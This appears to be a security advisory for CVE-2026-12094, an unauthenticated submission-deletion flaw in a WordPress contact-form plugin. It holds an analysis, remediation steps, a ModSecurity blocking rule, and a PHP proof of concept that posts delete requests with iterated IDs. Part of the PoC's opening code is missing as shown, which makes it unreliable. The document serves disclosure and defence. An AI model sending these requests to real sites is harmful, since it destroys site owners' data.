CVE-2026-12094: Advanced Contact Form 7 <= 1.0.0 Missing Authorization to Unauthenticated Arbitrary Contact Form Submission Deletion via 'form_id' Parameter PoC, Patch Analysis & Rule

{
“analysis”: “Atomic Edge analysis of CVE-2026-12094 (metadata-based):nThis vulnerability affects the Advanced Contact Form 7 – Compact DB plugin (slug: advanced-contact-form-7-compact-db) version 1.0.0. It allows an unauthenticated attacker to delete arbitrary contact form submission entries stored in the plugin’s custom database table. The CVSS score is 5.3 (medium), with a vector of AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N, indicating no confidentiality impact but low integrity impact.nnThe root cause is a missing authorization check in the function `cf7cdb_ajax_delete_user()`. The CWE classification of 862 (Missing Authorization) confirms this. The function is registered as an AJAX handler for both authenticated (`wp_ajax_cf7cdb_delete`) and unauthenticated (`wp_ajax_nopriv_cf7cdb_delete`) users. The description confirms the handler performs no nonce verification, no capability check, and no ownership check before calling `$wpdb->delete()` on the `wp_cf7cdb_data` table with an attacker-supplied integer ID. Without source code, Atomic Edge inference is that the function simply takes the `form_id` parameter (likely a POST parameter named `form_id` or similar) and uses it directly in a delete query without validating the user’s permissions or ownership of the record.nnAn unauthenticated attacker can exploit this by sending a POST request to `/wp-admin/admin-ajax.php` with the `action` parameter set to `cf7cdb_delete` and a numeric `form_id` parameter. The attacker can enumerate sequential primary-key IDs to delete any submission stored in the plugin’s database. For example, only the value of `form_id` needs to be iterated (e.g., 1, 2, 3, …). There is no authentication required and no nonce to bypass. The attack is straightforward and requires no special privileges.nnTo remediate this vulnerability, the developer must implement proper authorization. This includes: 1) Adding a nonce verification using `wp_verify_nonce()` with a unique action name. 2) Checking that the current user has the appropriate capability (e.g., `manage_options` or a custom capability) before allowing deletion. 3) Verifying that the submission being deleted belongs to the current user if intended to be user-owned. 4) Removing the `wp_ajax_nopriv_*` hook registration if the action should only be available to authenticated users. The fix is standard WordPress security practice.nnIf exploited, an attacker can delete any contact form submission records stored by the plugin. This could result in loss of data, including potentially important user inquiries, feedback, or order information submitted through Contact Form 7. While the CVSS score indicates low integrity impact, the ease of exploitation (unauthenticated, no specialized network access) increases the real-world risk. The attacker can systematically delete all stored submissions by iterating through IDs, causing data loss and potential disruption to site operations.”,
“poc_php”: “// Atomic Edge CVE Research – Proof of Concept (metadata-based)n// CVE-2026-12094 – Advanced Contact Form 7 $action,n ‘form_id’ => $form_idn);nn// Initialize cURLn$ch = curl_init();ncurl_setopt($ch, CURLOPT_URL, $target_url . ‘/wp-admin/admin-ajax.php’);ncurl_setopt($ch, CURLOPT_RETURNTRANSFER, true);ncurl_setopt($ch, CURLOPT_POST, true);ncurl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));ncurl_setopt($ch, CURLOPT_HTTPHEADER, array(n ‘Content-Type: application/x-www-form-urlencoded’n));nn// Execute the requestn$response = curl_exec($ch);n$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);ncurl_close($ch);nn// Output resultnif ($http_code == 200) {n echo ‘[+] Successfully sent delete request for form_id: ‘ . $form_id . PHP_EOL;n echo ‘[+] Response: ‘ . $response . PHP_EOL;n} else {n echo ‘[-] Request failed with HTTP code: ‘ . $http_code . PHP_EOL;n}n”,
“modsecurity_rule”: “# Atomic Edge WAF Rule – CVE-2026-12094 (metadata-based)n# Block unauthenticated AJAX delete requests for Advanced Contact Form 7 Compact DB pluginnSecRule REQUEST_URI “@streq /wp-admin/admin-ajax.php” \n “id:20262094,phase:2,deny,status:403,chain,msg:’CVE-2026-12094 – Advanced Contact Form 7 Ajax Delete Exploit’,severity:’CRITICAL’,tag:’CVE-2026-12094′”n SecRule ARGS_POST:action “@streq cf7cdb_delete” “chain”n SecRule ARGS_POST:form_id “@rx ^\d+$””
}